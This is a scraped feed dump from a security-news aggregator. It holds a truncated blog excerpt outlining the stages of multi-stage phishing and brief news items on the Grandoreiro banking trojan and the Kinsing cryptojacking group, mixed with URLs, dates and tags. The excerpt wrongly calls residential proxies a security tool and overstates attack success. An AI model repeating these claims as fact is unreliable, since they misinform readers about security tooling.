emails, or even physical methods such as USB drops. Establishing Trust After establishing contact with the target, the threat actor builds trust. This often involves impersonating legitimate entities or using communication channels familiar to the target, making it easy for them to fall victim and trust the threat actor. Introducing Complexities As the attack progresses, the threat actor introduces complexities such as using CAPTCHAs, QR Codes, and steganography to create further layers of deception, guaranteeing the attack\'s success. Exploitation The final stage of the attack involves exploiting the target. At this stage, the threat actor could either deploy malware, extract sensitive information, or perform any other malicious activity that might have been the goal of the whole attack. This multi-layered nature of a phishing attack makes it hard to detect through traditional security tools like residential proxies and phishing detection tools. Therefore, it ultimately makes the attack successful. How QR Codes, Captchas, and Steganography Are Used in Layered Phishing Attacks. In a multi-stage phishing attack, QR Codes, steganography, and CAPTCHAs are used to overcome security barriers and increase the attack\'s efficiency. Here is how each of these elements is used to ensure the attack is successful: QR Codes Quick Response or QR codes have become ubiquitous in various applications since they a]]> 2024-05-20T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/dissecting-a-multi-stage-phishing-attack www.secnews.physaphae.fr/article.php?IdArticle=8503291 False Ransomware,Malware,Tool,Threat None 2.0000000000000000 Korben - Bloger francais 2024-05-20T08:08:39+00:00 https://korben.info/gps-risques-brouillage-leurrage-expliques.html www.secnews.physaphae.fr/article.php?IdArticle=8503265 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The threat actors behind the Windows-based Grandoreiro banking trojan have returned in a global campaign since March 2024 following a law enforcement takedown in January. The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South]]> 2024-05-19T13:29:00+00:00 https://thehackernews.com/2024/05/grandoreiro-banking-trojan-resurfaces.html www.secnews.physaphae.fr/article.php?IdArticle=8502695 False Threat,Legislation None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The cryptojacking group known as Kinsing has demonstrated its ability to continuously evolve and adapt, proving to be a persistent threat by swiftly integrating newly disclosed vulnerabilities to exploit arsenal and expand its botnet. The findings come from cloud security firm Aqua, which described the threat actor as actively orchestrating illicit cryptocurrency mining]]> 2024-05-17T22:50:00+00:00 https://thehackernews.com/2024/05/kinsing-hacker-group-exploits-more.html www.secnews.physaphae.fr/article.php?IdArticle=8501763 False Vulnerability,Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-17T19:54:33+00:00 https://community.riskiq.com/article/ce0bf000 www.secnews.physaphae.fr/article.php?IdArticle=8501845 False Ransomware,Tool,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-17T19:11:34+00:00 https://community.riskiq.com/article/86a682a8 www.secnews.physaphae.fr/article.php?IdArticle=8501846 False Malware,Tool,Threat,Technical None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-17T16:57:23+00:00 https://community.riskiq.com/article/055cd342 www.secnews.physaphae.fr/article.php?IdArticle=8501757 False Malware,Threat,Cloud None 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET This week, ESET experts released several research publications that shine the spotlight on a number of notable campaigns and broader developments on the threat landscape]]> 2024-05-17T16:09:11+00:00 https://www.welivesecurity.com/en/videos/who-where-how-apt-attacks-week-security-tony-anscombe/ www.secnews.physaphae.fr/article.php?IdArticle=8502147 False Threat None 3.0000000000000000